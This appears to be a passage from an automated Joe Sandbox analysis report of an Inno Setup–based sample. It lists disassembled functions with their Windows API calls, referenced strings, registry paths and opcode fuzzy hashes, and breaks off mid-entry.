                                                                              • Instruction ID: fec6fabf6d030a51aab30bc406273ff78954f96defe81b00f374268ef7e1f253
                                                                              • Opcode Fuzzy Hash: 48900d8d8fc19135f8d19aada3e9e9d8d34cb92564939e70bb5bc2663f887e99
                                                                              • Instruction Fuzzy Hash: 2A11CBB27046047FEB00DB6A9C91D6F77ECDB49750F10817BF504D72D0D6399E018669
                                                                              APIs
                                                                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00424412
                                                                              • TranslateMessage.USER32(?), ref: 0042448F
                                                                              • DispatchMessageA.USER32(?), ref: 00424499
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Message$DispatchPeekTranslate
                                                                              • String ID:
                                                                              • API String ID: 4217535847-0
                                                                              • Opcode ID: d4f7142ddfb2041a0388c754ad29f8297397d1c5d5a6fc901d04af05902ad934
                                                                              • Instruction ID: 8eae6dca0d2455523dd27ca57e4683f6da326f6f2f90499d04ddbfd693f83f9d
                                                                              • Opcode Fuzzy Hash: d4f7142ddfb2041a0388c754ad29f8297397d1c5d5a6fc901d04af05902ad934
                                                                              • Instruction Fuzzy Hash: E3116D303043205AEB20FA24A941B9F73D4DFC5758F80481EFC99972C2D77D9D49879A
                                                                              APIs
                                                                              • SetPropA.USER32(00000000,00000000), ref: 0041666A
                                                                              • SetPropA.USER32(00000000,00000000), ref: 0041667F
                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 004166A6
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Prop$Window
                                                                              • String ID:
                                                                              • API String ID: 3363284559-0
                                                                              • Opcode ID: ff8df5d04f2ecdb5f17762fdbd8b59dc717163ef82ea70d213bab306533cf9bb
                                                                              • Instruction ID: 6913c5f2d07602d921388148e43cadd8ab2d6729f30613f48e4cae6714e3bc13
                                                                              • Opcode Fuzzy Hash: ff8df5d04f2ecdb5f17762fdbd8b59dc717163ef82ea70d213bab306533cf9bb
                                                                              • Instruction Fuzzy Hash: ACF01271701210ABDB10AB599C85FA732DCAB09714F16057AB905EF286C778DC40C7A8
                                                                              APIs
                                                                              • IsWindowVisible.USER32(?), ref: 0041EE64
                                                                              • IsWindowEnabled.USER32(?), ref: 0041EE6E
                                                                              • EnableWindow.USER32(?,00000000), ref: 0041EE94
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Window$EnableEnabledVisible
                                                                              • String ID:
                                                                              • API String ID: 3234591441-0
                                                                              • Opcode ID: 495d6a49dc4b54b7e424eeae3cce025a94256eba33976185de8149e812397146
                                                                              • Instruction ID: 3b4cb379701a2ac24b7d0c87bf9454d2e26b3d0fb89a85d5a5a22e513a73856b
                                                                              • Opcode Fuzzy Hash: 495d6a49dc4b54b7e424eeae3cce025a94256eba33976185de8149e812397146
                                                                              • Instruction Fuzzy Hash: EAE06DB5100301AAE301AB2BDC81B5B7A9CAB54350F05843BA9089B292D63ADC408B7C
                                                                              APIs
                                                                              • SetActiveWindow.USER32(?), ref: 00469EA1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ActiveWindow
                                                                              • String ID: PrepareToInstall
                                                                              • API String ID: 2558294473-1101760603
                                                                              • Opcode ID: e58a16817a64f5759f31888600c1354bb1a8a8b494c3c93af2f1dbc242ca25c6
                                                                              • Instruction ID: ccacc6dcba8b8cbbfa1c17f86b27e08b0c11e5798d11daccd90c331c988b02c3
                                                                              • Opcode Fuzzy Hash: e58a16817a64f5759f31888600c1354bb1a8a8b494c3c93af2f1dbc242ca25c6
                                                                              • Instruction Fuzzy Hash: 7EA11934A00109DFCB00EF59D986EDEB7F5AF48304F6580B6E404AB366D778AE41DB99
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: /:*?"<>|
                                                                              • API String ID: 0-4078764451
                                                                              • Opcode ID: 43277fb1c717e2606564b112b1b0681d416f5021830c97b09ce096e65d7cf365
                                                                              • Instruction ID: 1e87f3d38ec7dbf16fc1afa4daea9e6ca85b65b9a8fb7c68475855461939e3a0
                                                                              • Opcode Fuzzy Hash: 43277fb1c717e2606564b112b1b0681d416f5021830c97b09ce096e65d7cf365
                                                                              • Instruction Fuzzy Hash: 4371A470A40214ABDB10EB66DDD2BEE77A19F40308F1084A7F580AB392E779AD45875F
                                                                              APIs
                                                                              • SetActiveWindow.USER32(?), ref: 0048215A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ActiveWindow
                                                                              • String ID: InitializeWizard
                                                                              • API String ID: 2558294473-2356795471
                                                                              • Opcode ID: 376233a1d1dddbf1dd43b25fae561af2bf40b6633c4dd7a0e8b1389a7c4343be
                                                                              • Instruction ID: 36b0f45b5e581da985bac651985c8aaa8d6a9bed6a39233588f506be3a995c8b
                                                                              • Opcode Fuzzy Hash: 376233a1d1dddbf1dd43b25fae561af2bf40b6633c4dd7a0e8b1389a7c4343be
                                                                              • Instruction Fuzzy Hash: 79119434205200AFD701FBA9EEDAB1937E4EB59328F60047BF5009B6A1DA796C00CB5D
                                                                              APIs
                                                                                • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004836C7,?,00000001,?,?,004836C7,?,00000001,00000000), ref: 0042DE38
                                                                              • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,0047C230,00000000,0047C432), ref: 0047C029
                                                                              Strings
                                                                              • Software\Microsoft\Windows\CurrentVersion, xrefs: 0047BFF9
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CloseOpen
                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion
                                                                              • API String ID: 47109696-1019749484
                                                                              • Opcode ID: 91d5c32787d00ddb3ecc29a404e36154aacf37a6ecdb6076e024b20848598476
                                                                              • Instruction ID: 5930872802659161668f2fc27ec2b8a5c579264ce8ecaca434dd7baa373bea44
                                                                              • Opcode Fuzzy Hash: 91d5c32787d00ddb3ecc29a404e36154aacf37a6ecdb6076e024b20848598476
                                                                              • Instruction Fuzzy Hash: B1F08231700514A7DA00A69E6D82B9BA79D9B84758F20403FF508DB242DABE9E0202EC
                                                                              APIs
                                                                              • RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,00475FFE,?,0049C1DC,?,0046EFCF,?,00000000,0046F56A,?,_is1), ref: 0046ECDB
                                                                              Strings
                                                                              • Inno Setup: Setup Version, xrefs: 0046ECD9
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Value
                                                                              • String ID: Inno Setup: Setup Version
                                                                              • API String ID: 3702945584-4166306022
                                                                              • Opcode ID: 56bbb1f4a6cd77c20b542710a526df67742b244f3cd53e0af7fea37619b23a66
                                                                              • Instruction ID: 3111e2ab1a00cbee8849f506c2bc3fe53732bb3e30b7299e44938699edfd3f7c
                                                                              • Opcode Fuzzy Hash: 56bbb1f4a6cd77c20b542710a526df67742b244f3cd53e0af7fea37619b23a66
                                                                              • Instruction Fuzzy Hash: 71E06D753012043FE710AA2B9C85F5BBBDCDF99765F10403AB909DB392D978DD0085A8
                                                                              APIs
                                                                              • RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F3A6,?,?,00000000,0046F56A,?,_is1,?), ref: 0046ED3B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Value
                                                                              • String ID: NoModify
                                                                              • API String ID: 3702945584-1699962838
                                                                              • Opcode ID: 306e8526e04bb1da42350282118940b5300f429dbb2620f70078b8bfc6bd1a7c
                                                                              • Instruction ID: e7aa99f2e089c5623e338f59092b711216c244eb116ac0446a77828d65f342ac
                                                                              • Opcode Fuzzy Hash: 306e8526e04bb1da42350282118940b5300f429dbb2620f70078b8bfc6bd1a7c
                                                                              • Instruction Fuzzy Hash: 3AE04FB4640304BFEB04DB55CD4AF6B77ECDB48710F104059BA049B291E674FE00CA68
                                                                              APIs
                                                                              • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004836C7,?,00000001,?,?,004836C7,?,00000001,00000000), ref: 0042DE38
                                                                              Strings
                                                                              • System\CurrentControlSet\Control\Windows, xrefs: 0042DE36
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Open
                                                                              • String ID: System\CurrentControlSet\Control\Windows
                                                                              • API String ID: 71445658-1109719901
                                                                              • Opcode ID: a11f376e1d034aeb0d9ae53f60934921bcd728bb93d306f1768079d63b1ffdfe
                                                                              • Instruction ID: 60e43675bb36a9eef4a15598a1848ca3f705ecc445ee8c9fe52fc6b05f1352bb
                                                                              • Opcode Fuzzy Hash: a11f376e1d034aeb0d9ae53f60934921bcd728bb93d306f1768079d63b1ffdfe
                                                                              • Instruction Fuzzy Hash: 29D09E72950128BB9B009A89DC41DFB775DDB15760F45441BF9049B141C5B4AC5197E4
                                                                              APIs
                                                                              • GetACP.KERNEL32(?,?,00000001,00000000,0047E237,?,-0000001A,004800ED,-00000010,?,00000004,0000001B,00000000,0048043A,?,0045D9B8), ref: 0047DFCE
                                                                                • Part of subcall function 0042E31C: GetDC.USER32(00000000), ref: 0042E32B
                                                                                • Part of subcall function 0042E31C: EnumFontsA.GDI32(?,00000000,0042E308,00000000,00000000,0042E374,?,00000000,00000000,004804A1,?,?,00000001,00000000,00000002,00000000), ref: 0042E356
                                                                                • Part of subcall function 0042E31C: ReleaseDC.USER32(00000000,?), ref: 0042E36E
                                                                              • SendNotifyMessageA.USER32(0002042A,00000496,00002711,-00000001), ref: 0047E19E
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: EnumFontsMessageNotifyReleaseSend
                                                                              • String ID:
                                                                              • API String ID: 2649214853-0
                                                                              • Opcode ID: e029a571d7ea910feaf489f47ebd39d374a0288316229fc386b1e2e4e1e2ac40
                                                                              • Instruction ID: 52cd92918bf59317d76ec0dbded9268cc5ddbf6ebeab8dbad6023b52803fe890
                                                                              • Opcode Fuzzy Hash: e029a571d7ea910feaf489f47ebd39d374a0288316229fc386b1e2e4e1e2ac40
                                                                              • Instruction Fuzzy Hash: 045196746001108BC710FF26D981A9B37E9EB58308B90C67BA4089B3A7CB7CDD46CB9D
                                                                              APIs
                                                                              • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,004021FC), ref: 004020CB
                                                                                • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,023AC268,00003D94,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,023AC268,00003D94,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,023AC268,00003D94,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,023AC268,00003D94,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
                                                                              • String ID:
                                                                              • API String ID: 296031713-0
                                                                              • Opcode ID: ab3545b22e3440e815b1719652ff5d854977479bd1b850cbba673e5eb4522dee
                                                                              • Instruction ID: 30adadd309813d1a6846ca6b4958dbaac508113c784b73a5bb8d11bfdb372a30
                                                                              • Opcode Fuzzy Hash: ab3545b22e3440e815b1719652ff5d854977479bd1b850cbba673e5eb4522dee
                                                                              • Instruction Fuzzy Hash: 3941E3B2E00304DFDB10CF69EE8521A77A4F7A8324B15417FD854A77E2D3789801DB88
                                                                              APIs
                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,0042DD38), ref: 0042DC3C
                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,70000000,?,?,00000000,?,00000000,?,00000000,0042DD38), ref: 0042DCAC
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: QueryValue
                                                                              • String ID:
                                                                              • API String ID: 3660427363-0
                                                                              • Opcode ID: b62dc44b296d1c54c0416b8d239270b5fe200a79a82432283709fd1da487490f
                                                                              • Instruction ID: 5bd1c55a509b6dee259ffcee94d68868fe84ce326e73fb4cf6662c4527ef549e
                                                                              • Opcode Fuzzy Hash: b62dc44b296d1c54c0416b8d239270b5fe200a79a82432283709fd1da487490f
                                                                              • Instruction Fuzzy Hash: 9D414171E00529ABDB11DF95D881BAFB7B8EB04704F918466E810F7241D778AE00CBA5
                                                                              APIs
                                                                              • RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0042DFD6,?,?,00000008,00000000,00000000,0042E003), ref: 0042DF6C
                                                                              • RegCloseKey.ADVAPI32(?,0042DFDD,?,00000000,00000000,00000000,00000000,00000000,0042DFD6,?,?,00000008,00000000,00000000,0042E003), ref: 0042DFD0
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CloseEnum
                                                                              • String ID:
                                                                              • API String ID: 2818636725-0
                                                                              • Opcode ID: 4ba9105902ea8f19abce0b58cfd6361b4b3e39fae621ffe28cce2eb109bf1346
                                                                              • Instruction ID: d62689c7b7995b9893119ef97773413105dd68debc8ff02f2d4f9d8a28cc91ff
                                                                              • Opcode Fuzzy Hash: 4ba9105902ea8f19abce0b58cfd6361b4b3e39fae621ffe28cce2eb109bf1346
                                                                              • Instruction Fuzzy Hash: DD31B270F04258AEDB11DFA6DD42BAEBBB9EB49304F91407BE501E6280D6785E01CA2D
                                                                              APIs
                                                                              • CreateProcessA.KERNEL32(00000000,00000000,?,?,004580C8,00000000,004580B0,?,?,?,00000000,00452862,?,?,?,00000001), ref: 0045283C
                                                                              • GetLastError.KERNEL32(00000000,00000000,?,?,004580C8,00000000,004580B0,?,?,?,00000000,00452862,?,?,?,00000001), ref: 00452844
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CreateErrorLastProcess
                                                                              • String ID:
                                                                              • API String ID: 2919029540-0
                                                                              • Opcode ID: 32d7980bd8ec2bee900e92c865b72ef71cfaa45d55aa0c85c0401d49ed696f28
                                                                              • Instruction ID: fcc055d8c1a696a2a0db1e32a085008d871673fec5534948229a16d4440eefa6
                                                                              • Opcode Fuzzy Hash: 32d7980bd8ec2bee900e92c865b72ef71cfaa45d55aa0c85c0401d49ed696f28
                                                                              • Instruction Fuzzy Hash: A2113C72600208AF8B40DEA9DD41D9F77ECEB4E310B114567FD18D3241D678EE148B68
                                                                              APIs
                                                                              • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040ADF2
                                                                              • FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040AF4F,00000000,0040AF67,?,?,?,00000000), ref: 0040AE03
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Resource$FindFree
                                                                              • String ID:
                                                                              • API String ID: 4097029671-0
                                                                              • Opcode ID: 724046dbf40c25189cee710f776ecaa222692b14a71540f68148777f5d1b7dbd
                                                                              • Instruction ID: 3d7a77417cef7b3885e8747e4544195f2de945da78ee84bb1155330bb8f828e3
                                                                              • Opcode Fuzzy Hash: 724046dbf40c25189cee710f776ecaa222692b14a71540f68148777f5d1b7dbd
                                                                              • Instruction Fuzzy Hash: 0301F771300700AFD700FF69EC52E1B77EDDB46714710807AF500AB3D1D639AC10966A
                                                                              APIs
                                                                              • GetCurrentThreadId.KERNEL32 ref: 0041EEF3
                                                                              • EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
